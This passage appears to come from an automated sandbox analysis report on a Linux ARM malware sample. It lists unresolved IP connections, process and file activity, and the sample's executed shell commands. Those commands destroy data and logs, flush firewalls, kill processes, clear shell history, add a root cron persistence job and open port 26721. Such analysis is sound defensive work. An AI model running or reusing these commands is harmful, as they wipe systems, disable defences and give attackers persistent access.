Source: unknown | TCP traffic detected without corresponding DNS query: 185.125.190.26 |
Source: unknown | TCP traffic detected without corresponding DNS query: 212.118.43.167 |
Source: unknown | TCP traffic detected without corresponding DNS query: 212.118.43.167 |
Source: unknown | TCP traffic detected without corresponding DNS query: 212.118.43.167 |
Source: unknown | TCP traffic detected without corresponding DNS query: 212.118.43.167 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.125.190.26 |
Source: unknown | TCP traffic detected without corresponding DNS query: 212.118.43.167 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 51.77.149.139 |
Source: unknown | UDP traffic detected without corresponding DNS query: 194.36.144.87 |
Source: unknown | UDP traffic detected without corresponding DNS query: 134.195.4.2 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 185.181.61.24 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: unknown | UDP traffic detected without corresponding DNS query: 178.254.22.166 |
Source: /usr/bin/rm (PID: 5437) | Directory: /var/lib/php/.. | Jump to behavior |
Source: /usr/bin/rm (PID: 5437) | Directory: /var/lib/gdm3/.cache | Jump to behavior |
Source: /usr/bin/rm (PID: 5437) | Directory: /var/lib/gdm3/.cache | Jump to behavior |
Source: /usr/bin/rm (PID: 5437) | Directory: /var/lib/gdm3/.config | Jump to behavior |
Source: /usr/bin/rm (PID: 5437) | Directory: /var/lib/gdm3/.config | Jump to behavior |
Source: /usr/bin/rm (PID: 5437) | Directory: /var/lib/gdm3/.local | Jump to behavior |
Source: /usr/bin/rm (PID: 5437) | Directory: /var/lib/gdm3/.local | Jump to behavior |
Source: /usr/bin/rm (PID: 5437) | Directory: /var/lib/snapd/assertions/asserts-v0/.. | Jump to behavior |
Source: /usr/bin/rm (PID: 5437) | Directory: /var/lib/snapd/assertions/.. | Jump to behavior |
Source: /usr/bin/rm (PID: 5437) | Directory: /var/lib/snapd/.. | Jump to behavior |
Source: /usr/bin/rm (PID: 5437) | Directory: /var/lib/colord/.cache | Jump to behavior |
Source: /usr/bin/rm (PID: 5437) | Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants | Jump to behavior |
Source: /usr/bin/rm (PID: 5437) | Directory: /var/lib/systemd/deb-systemd-helper-enabled/.wants | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/230/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/230/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/110/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/110/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/231/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/231/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/111/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/111/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/232/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/232/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/112/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/112/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/233/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/233/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/113/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/113/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/234/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/234/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/114/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/114/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/235/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/235/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/115/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/115/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/236/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/236/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/116/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/116/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/237/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/237/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/117/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/117/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/238/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/238/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/118/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/118/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/239/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/239/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/119/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/119/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/3633/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/3633/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/914/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/914/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/10/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/10/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/917/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/917/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/11/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/11/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/12/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/12/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/5273/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/5273/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/13/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/13/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/14/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/14/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/15/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/15/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/16/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/16/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/17/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/17/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/18/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/18/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/19/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/19/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/240/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/240/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/3095/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/3095/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/120/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/120/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/241/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/241/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/121/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/121/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/242/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/242/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/1/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/1/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/122/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/122/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/243/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/243/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/2/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/2/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/123/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/123/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/244/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/244/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/3/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/3/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/124/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/124/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/245/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/245/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/1588/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/1588/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/125/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/125/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/4/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/4/cmdline | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/246/status | Jump to behavior |
Source: /usr/bin/pkill (PID: 5471) | File opened: /proc/246/cmdline | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5435) | Shell command executed: /bin/sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5441) | Shell command executed: /bin/sh -c "rm -rf /tmp/*" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5444) | Shell command executed: /bin/sh -c "iptables -F" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5450) | Shell command executed: /bin/sh -c "pkill -9 busybox" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5464) | Shell command executed: /bin/sh -c "pkill -9 perl" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5469) | Shell command executed: /bin/sh -c "pkill -9 python" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5472) | Shell command executed: /bin/sh -c "service iptables stop" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5482) | Shell command executed: /bin/sh -c "/sbin/iptables -F; /sbin/iptables -X" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5486) | Shell command executed: /bin/sh -c "service firewall stop" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5517) | Shell command executed: /bin/sh -c "history -c" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5519) | Shell command executed: /bin/sh -c "rm -rf ~/.bash_history" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5522) | Shell command executed: /bin/sh -c "history -w" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5532) | Shell command executed: /bin/sh -c "chmod +x /dev/ocmount" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5535) | Shell command executed: /bin/sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5537) | Shell command executed: /bin/sh -c /dev/ocmount | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5592) | Shell command executed: /bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5639) | Shell command executed: /bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5645) | Shell command executed: /bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5652) | Shell command executed: /bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5658) | Shell command executed: /bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5548) | Shell command executed: /bin/sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5637) | Shell command executed: /bin/sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5643) | Shell command executed: /bin/sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5648) | Shell command executed: /bin/sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" | Jump to behavior |
Source: /tmp/arm7.elf (PID: 5654) | Shell command executed: /bin/sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT" | Jump to behavior |